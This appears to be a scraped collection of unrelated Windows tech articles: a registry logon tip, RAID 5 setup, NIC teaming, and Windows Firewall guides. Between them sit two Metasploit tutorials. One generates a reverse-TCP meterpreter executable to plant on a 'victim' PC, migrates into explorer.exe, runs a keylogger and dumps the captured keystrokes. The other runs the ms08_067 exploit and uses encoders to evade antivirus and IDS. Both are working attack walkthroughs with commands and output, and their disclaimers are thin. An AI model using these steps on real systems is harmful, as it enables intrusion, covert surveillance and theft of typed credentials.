gpedit.msc and autoplay

Want to keep people from accessing Windows, even as the default user? If you do not have a domain do not attempt this.
1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value “MustBeValidated”
4. Set the value to 1
This forced logon can be bypassed in Safe Mode on Windows 9x

Readmore...

Configuring and Managing RAID 5 on Windows Server 2012

An Overview of RAID 5

RAID 5 consists of three or more volumes each located on a separate physical disk. As with RAID 0, RAID 5 also uses disk striping, whereby blocks of data are divided up into stripes with each stripe written to a different disk. RAID 5, however, differs quite considerably from RAID 0. Under RAID 5, not only are the data stripes written, but also parity information relating to the data. The key to RAID 5 fault tolerance is the fact that the parity information for a particular data stripe is always written to a different drive from the drive containing the corresponding data stripe. This means that if a disk fails, the corresponding parity information stored on another disk can be used for error detection and data correction (also referred to as regeneration).
Whilst RAID 5 has considerable advantages over RAID 0 there are one or two drawbacks that should be taken into consideration when considering this storage option. Firstly, there is the inevitable performance overhead inherent in calculating and storing parity information for each data stripe written to disk. Secondly, the loss of more than one disk in a RAID 5 array will leave insufficient parity data on the remaining disks to regenerate the original data. That said, RAID 5 does provide considerable advantages that generally outweigh the disadvantages.

Configuring RAID 5 Using Windows Server 2008 Disk Management

A Windows Server 2008 RAID 5 configuration may be set up using the Disk Management snap-in. This is accessed either from the Server Manager or Computer Management tools. To launch the Server Manager, open the Start menu and click on the Server Manager option, or click on the Server Manager icon in the task bar. Alternatively launch Computer Management from Start -> All Programs -> Administration Tools -> Computer Management or run compmgmt.csc at the command prompt or in a Run dialog. In all cases the Disk Management tool can be found under the Storage category.
As previously noted, RAID 5 implementation requires a minimum of 3 disk drives. For the purposes of this tutorial a system containing four disk drives is assumed. In this scenario, disk 0 is the system disk and disks 1 through 3 are available for use in the RAID 5 configuration. Before proceeding the disks will need to be initialized using either the MBR or GPT partition style. Assuming these prerequisites are met the first step is to right click on one of the 3 disks in the Disk Management graphical view. In the resulting popup menu select the New RAID-5 Volume... option to invoke the New RAID-5 Volume wizard. On the wizard's welcome page click on the Next button to proceed to the Disk Selection screen. This screen contains a list of disk drives available for inclusion in the disk array together with a list of selected disks. Currently only the current disk is included in the Selected list. Two more disks must be added to the selected disks before the RAID 5 array can be built. Select disks from the Available list and click on the Add> button to add the disk to the selected list. Once sufficient disks (in this case disks 1, 2 and 3) are selected the Next button will activate to allow the remainder of the configuration to be completed. Note that disk 0 (the system disk) is not included in the RAID 5 array:

With the disk selections completed, the Next button proceeds to the drive letter and mount point assignment screen. Once these settings are configured click Next to proceed to the Format Volume screen. Select the appropriate file system and compression options and click on Next to proceed to the Summary screen. Review the information displayed and click on Finish to initiate the RAID 5 creation process. During this process the Disk Management graphical view will list the disks as Formatting and then Resynching. The amount of time these phases will take depends on the size of the volumes in question. Once the process is complete the status will change to Healthy and the RAID 5 volume is ready for use.

Configuring RAID 5 from the Command Prompt using DiskPart

In addition to configuring RAID 5 from within Disk Management, the configuration may also be implemented from the command prompt using DiskPart. DiskPart may be launched either from a command prompt or a Run dialog simply by typing diskpart. Once invoked, DiskPart will display the DiskPart> command prompt and is ready to receive commands.
The first step in the configuration process is to identify the disks attached to the system using the list disk command:

DISKPART> list disk

  Disk ###  Status      Size     Free     Dyn  Gpt
  --------  ----------  -------  -------  ---  ---
  Disk 0    Online        30 GB    15 GB   *
  Disk 1    Online         8 GB  8189 MB
  Disk 2    Online         8 GB  8189 MB
  Disk 3    Online         8 GB  8189 MB

For the purposes of this chapter disks 1, 2 and 3 will be used to create a RAID 5 configuration. Each of these disks needs to be converted to dynamic disks before the configuration can proceed. This is achieved by selecting each disk in turn and executing the convert dynamic command:

DISKPART> select disk 1

Disk 1 is now the selected disk.

DISKPART> convert dynamic

DiskPart successfully converted the selected disk to dynamic format.

DISKPART> select disk 2

Disk 2 is now the selected disk.

DISKPART> convert dynamic

DiskPart successfully converted the selected disk to dynamic format.

DISKPART> select disk 3

Disk 3 is now the selected disk.

DISKPART> convert dynamic

DiskPart successfully converted the selected disk to dynamic format.

Once the disks have been converted to dynamic disks the next step is to create the RAID 5 volume using the create volume raid command. This command also takes as a parameter the disk= directive followed by a list of disks to be used in the array. The size= directive may also be specified to declare the size of the volume. If this value is omitted the volume will be sized to match the smallest contiguous block of unallocated space on the designated disk drives:

DISKPART> create volume raid disk=1,2,3

DiskPart successfully created the volume.

Once the command has completed and displayed the DISKPART> prompt the system will have begun the resynching process. This can take a considerable amount of time depending on the size of the volume. During this process, the status of the volume will be listed as Rebuild when the list volume command is executed:

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
* Volume 0                      RAW    RAID-5        16 GB  Rebuild
  Volume 1     C                NTFS   Simple        15 GB  Healthy    System
  Volume 2     D                       DVD-ROM         0 B  No Media

Once the resynch is complete the volume status will change to Healthy at which point the volume may be formatted (the RAW type listed above indicates the volume has yet to be formatted). The volume may be formatted using the format command as follows:

DISKPART> format fs=ntfs label="RAID 5 Vol"

  100 percent completed

DiskPart successfully formatted the volume.

Once the volume has been formatted the RAID 5 configuration is ready for use.

Fixing RAID 5 Problems

In order to function, all the disks in a RAID 5 configuration must be online and healthy. If the RAID 5 set displays Failed Redundancy and the volume is listed as Offline, Missing or Online (Errors) there is a problem which needs to be resolved.
If the status is Offline or Missing, check that the disk is connected and powered up. If the problem is resolved select Rescan Disks from the Actions menu. Once the rescan is complete right click on the problematic drive and select Reactivate. All being well the drive status will change to Regenerating as the data is rebuilt using the parity information on the other drives in the array. If, once regeneration is complete, the status does not return to Healthy, right click once again and select Regenerate Parity.
If a disk in a RAID 5 configuration is listed as Failed or Online (Errors) repeat the above steps. If this fails the disk may be unrecoverable and will need to be replaced. To achieve this, right click on the volume on the failed disk and select Remove Volume from the popup menu. Once the volume has been removed, right click on a suitable block of unallocated space on another dynamic disk which is not already part of the RAID 5 array, has sufficient space and has a matching partition style and select Repair Volume. This will rebuild the RAID 5 configuration using the space on new disk drive together with the remaining healthy disks from the original RAID 5 configuration.

Readmore...

How to Team Your Network Cards in Windows Server 2012

Windows Server 2012

The great thing about NIC teaming is that it is included in the box, free, and will work on any NIC that works with Windows Server 2012. It is remotely configurable and remains the same process no matter what card you use. Obviously you need a server and at least two NICs.

A team in Server 2012 can comprise two or more NICs from one or more vendors. The team can be added to after creation, and this is achievable from a Windows 8 client remotely on a Server 2012 machine - with or without a GUI on the server. The whole process is underpinned by PowerShell 3.0.
For the purpose of this guide, I will have three servers:
1. DC and DHCP server (single NIC)
2. Hydrangea (to be teamed, member of the domain)
3. Dahlia (to be teamed, member of the domain)
Of course all of this can be achieved using Virtual Servers. My setup was carried out on a Dell Laptop using Windows 8 RTM with Hyper-V.

Where to begin

It would be normal to use static IP addresses for all servers (or most of them), and certainly on a team of NICs. It is just as easy to use DHCP too, Server 2012 will allow that and I will use DHCP to ease the configuration.
So make sure you have a functional Server 2012 with a DHCP scope available to it (can be installed as a role on the server, or be available somewhere else on your network). If you have no DHCP, then you will need to manually assign IP addresses to your teams when you create them.
As a quick test of your current network configuration, run PowerShell 3.0 and enter the following commands:
RESOLVE-DNSNAME Hydrangea
RESOLVE-DNSNAME Dahlia
(The results of these Cmdlets show that each server has two NICs and two IP addresses - showing that the NICs are NOT teamed).

Now team the NICs on each server

This can be performed remotely from the DC. Run Server Manager and select All Servers, right-click Hydrangea and select Configure NIC Teaming, the dialog box that is presented allows all teaming activities.
Ensure the server is selected under Servers, and under Teams select Tasks and click on New Team.
Enter the Team Name - I used the creative name of "Team1" - then simply select the NICs you want to include in your team (minimum of two). Then select Additional Properties to choose how you want to set-up your team.
Now here are the really powerful settings. You can choose to be Switch dependent or independent, if redundant switches are important to you. You can choose if you want a standby adaptor or if you want all adaptors included and active. Finally, you can choose the VLAN you want this Team to operate on.
Select your options (Switch independent, None [for standby] and Default VLAN), then click OK. This will take a couple of minutes and will cause a loss of connectivity to the server you are managing (you are changing its IP address). To reconnect, you need to delete your local DNS cache and refresh server manager and all will be well (PowerShell – enter Clear-DNSClientCache and Resolve-DNSName ). This will show that you now have only one IP address and a single interface.
Repeat this set of steps on your second server. You now have a pair of teamed servers.

The way to test the teaming is quite simple, but does involve more PowerShell 3.0

First, on your equivalent of my Hydrangea server, run a PowerShell window and type Ping -t DC (where DC is your DC server name) this will keep pinging the DC until you tell it to stop, leave the window open.
Open another PowerShell window and set it side-by-side with the ping window. My NICs were called LAN and LAN2, you will need to use your correct naming in the below commands:
Get-netadapter
Disable-NetAdapter –Name “LAN” –Confirm:$False
After the first disable command – notice that the ping is still working fine
Disable-NetAdapter –Name “LAN2” –Confirm:$False
and only fails after the second disable command.
Enable-NetAdapter –Name “LAN” –Confirm:$False
Enable-NetAdapter –Name “LAN2” –Confirm:$False
Once NICs are re-enabled, all goes back to normal (in-fact comms are restored when the first NIC is re-enabled).

Summary

Prior to the release of Windows Server 2012, to be able to implement NIC teaming required several prerequisites:
1. NICs of the same make and model, and often of the same firmware revision
2. Third-party drivers built specifically for teaming
3. Skills in configuring the specific NICs and drivers.
With this groundbreaking release, Microsoft has provided all the functionality in the box for free – and removed all of the above.
Your NICs can be any make, model or revision; provided it works with Server 2012, the drivers all have the functionality built in.
The real USP is the fact that this can be done remotely on any number of servers through Server Manager and of course through

Readmore...

Exploiting the vulnerabilities (Metasploit Tutorial)

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.

Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).

In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.

I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.

For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~#/etc/init.d/wicd start

to start the wicd manager

Finally, type "startx" to start the GUI mode:

root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Have a note of it.

Now,

Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.

msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe

Your local IP is the one you noted earlier and for port you could select 4444.

(Everything has to be entered without quotes)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/metasploit3/msf3#

Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1^st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.

And now, you have set the meterpreter to listen to you on port 4444.

The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler...

Now, the payload is listening for all the incoming connections on port 444.

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps

Search for explorer.exe and migrate to the process

meterpreter > migrate 5716

[*] Migrating to 5716...

[*] Migration completed successfully.

meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,

Jus type shell

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You would now be having a command prompt,

Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed in anything on his computer.

Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is just for educational purposes only. You should test it against the computer you own.



About Author : This is a guest article written by Mr. Aditya Gupta. He is a  Cyber Security Expert and C|EH Certified Ethical Hacker. His main expertise include  Privacy Issues online, Web Application Security and Wireless Hacking. .

Readmore...

Metasploit Tutorial

Metasploit Tutorial: Introduction

1. Metasploit Terms
2. MSFconsole
3. MSFcli
4. Armitage
5. MSFpayload
6. MSFencode

Metasploit is a valuable tool in pen testing a network. However, it can be very confusing for a beginner. These metaspolit tutorials will help you get up and running with metasploit. Most of our hacking will be targeted to windows machines. As a reminder and site disclaimer: I am not responsible for your actions! This is for education only!
Recommended Reading: Metasploit: The Penetration Tester’s Guide
A Book that will show you most of the metasploit framework. However, it leaves you to discover the true power of metasploit for yourself. Overall, highly recommended.

Metasploit Terms

Exploit – to take advantage of a security flaw within a system, network, or application.
Payload - is code that our victim computer to execute by the metasploit framework.
Module - a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.

MSFconsole

Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch attacks, creating listeners, and much, much more. We will be using Msfconsole throughout these tutorials, but mastering it will allow you to keep up with metaspolits rapidly changing framework. Metasploit comes installed by default on backtrack 5. To access msfconsole, open your console and type:
root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
After sometime, the msfconsole will boot.
To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.
msf > help connect

MSFcli

Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability with other console-based tools. To view the msfcli help type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h
Now we are going to do a little test run of msfcli. It’s important to note whenever you’re learning metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:
root@bt:~# msfcli windows/smb/ms08_067_netapt o
This module requires three options: RHOST, RPORT, and SMPIPE. Adding P to the end allows us to see what payloads we can use.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P
we can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the ned of the msfcli argument string.
root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E

Note: the IP address assigned to RHOST is a windows XP machine that I have on a virtaul machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with windows updates. We will go over this more in-depth later on.


The armitage component is a fully interactive graphical user interface.

Running Armitage

1. Run the command armitage.
2. Select Start MSF.

MSFpayload

The msfpayload component of metasploit that generates shellcode, and executables. Shellcoe can bew generated in many formats including C, Ruby, JavaScript and even Visuabl Basic. Each output will be useful in various situations.
For msfpayload help type: root@bt~# msfpayload -h
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string, and this will cause the code to terminate before completion.
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit’s developers offer msfencode, which helps you to avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include “bad” characters.
Enter msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well known encoder is the: x86/shikata_ga_nai encoder.
To see the list of encoders available, append -l to msfencode as shown next. The payloads are ranked in order of reliability.
root@bt:~# msfencode -l

Readmore...

Open a port in Windows Firewall

Applies to Windows 7

If Windows Firewall is blocking a program and you want to allow that program to communicate through the firewall, you can usually do that by selecting the program in the list of allowed programs (also called the exceptions list) in Windows Firewall. To learn how to do this, see Allow a program to communicate through Windows Firewall.

However, if the program isn't listed, you might need to open a port. For example, to play a multiplayer game with friends online, you might need to open a port for the game so that the firewall allows the game information to reach your computer. A port stays open all the time, so be sure to close ports that you don't need open anymore.

1. Open Windows Firewall by clicking the Start button , and then clicking Control Panel. In the search box, type firewall, and then click Windows Firewall.
2. In the left pane, click Advanced settings.  If you're prompted for an administrator password or confirmation, type the password or provide confirmation.
3. In the Windows Firewall with Advanced Security dialog box, in the left pane, click Inbound Rules, and then, in the right pane, click New Rule.
4. Follow the instructions in the New Inbound Rule wizard.

If you’re having trouble allowing other computers to communicate with your computer through Windows Firewall, you can try using the Incoming Connections troubleshooter to automatically find and fix some common problems.

Open the Incoming Connections troubleshooter by clicking the Start button , and then clicking Control Panel. In the search box, type troubleshooter, and then click Troubleshooting. Click View all, and then click Incoming Connections.

For information about advanced firewall troubleshooting, see Windows Firewall with Advanced Security Troubleshooting Guide: Diagnostics and Tools and Troubleshooting Windows Firewall settings in Windows XP Service Pack 2 for advanced users.

Readmore...

Windows 7 Firewall

Windows 7

Checking for Windows 7 Firewall

To see if Windows 7 Firewall is running:

1. Click the Windows icon, and select Control Panel. The Control Panel window will appear.
2. Click on System and Security. The System and Security Panel will appear.



3.Click on Windows Firewall. The Windows Firewall panel will appear.



4. If a green check mark appears, Windows Firewall is running.

Configuring Windows 7 Firewall

If Windows Firewall is running and Immunet Protect is indicating "Offline Mode" problems, take the following steps:

1. On the left side of the Windows Firewall panel, click the Allow a program or feature through Windows Firewall link. The Allowed Programs panel will appear.



2. Click the Change Settings button.



3. Find Immunet Protect in the list of programs. If it appears in the list of programs, select Immunet Protect (or agent.exe) and click the Remove button. Confirm that the entry should be removed (the next steps will re-install the program). If Immunet Protect does not appear, then proceed to the next step.

4. Click the Allow another program button. The Add a Program window will appear.



5. In the Add a Program window, click the Browse... button.

6. Navigate to the Immunet Protect program directory (e.g. C:\Program Files\Immunet Protecrt\2.0\) and double-click on agent.exe.

7. Click the Add button.

8. Do this same for updater.exe.

9. Click the OK button to close the Allowed Programs panel.

Windows Vista

Checking for Windows Vista Firewall

To see if Windows Firewall is running:
1. Click the Windows icon, and select Control Panel. The Control Panel window will appear.



2. Click on the System header. The Security Panel will appear.



3. Click on the Windows Firewall header. The Windows Firewall panel will appear.



4. If a green check mark appears along with the message Windows Firewall is helping to protect your computer, Windows Firewall is running.

Configuring Windows Vista Firewall

1. On the left side of the Windows Firewall panel, click the Allow a program or feature through Windows Firewall. The Windows Firewall Settings window will appear.



2. Find Immunet Protect in the list of programs. If it is there, click to select it. If not, skip the next step.

3. With Immunet Protect selected, click the Delete button. Confirm that the entry should be deleted.

4. After removing the Immunet Protect entry or if Immunet Protect does not appear in the list of programs, click the Add program... button. The Add a Program window will appear.



5. In the Add a Program window, click the Browse... button.

6. Navigate to the Immunet Protect program directory (e.g. C:\Program Files\Immunet Protecrt\2.0\) and double-click on agent.exe.

7. Click the Add button.

8. Follow the same steps for updater.exe.

9. Click the OK button to close the Allowed Programs panel.

8. In the Windows Firewall Settings window, click to select the General tab.

9. Ensure that Block all incoming connections is not selected.

10. Click the OK button to close the Windows Firewall Settings window.

Windows XP

Checking for Windows XP Firewall

To see if Windows Firewall is running:

1. Click on the Windows Start button, and select Control Panel. The Control Panel window will appear.



2. Click on the Security Center link.



3. In the newly opened panel, if the Firewall header says ON, Windows Firewall is running.

Configuring Windows XP Firewall

If Windows XP Firewall is running and Immunet Protect is experiencing connection problems, perform the following steps:



1. In the Security Center, click the Windows Firewall graphic.



2. Ensure that Don't allow exceptions is not selected.



3. Click to select the Exceptions tab.

4. Find Immunet in the list of programs. If it is there, click to select it. If it is not on the list of programs, skip the next step.

5. With Immunet selected, click the Delete button. Confirm that the entry should be deleted (the next steps will re-install the program).

6. Click the Add Program button.


7. In the Add a Program window, click the Browse... button.

8. Navigate to the Immunet Protect program directory (e.g. C:\Program Files\Immunet Protecrt\2.0\) and double-click on agent.exe.

9. Click the OK button to close the Add a Program window.

10. Click the OK button to close the Windows Firewall Settings window.

Readmore...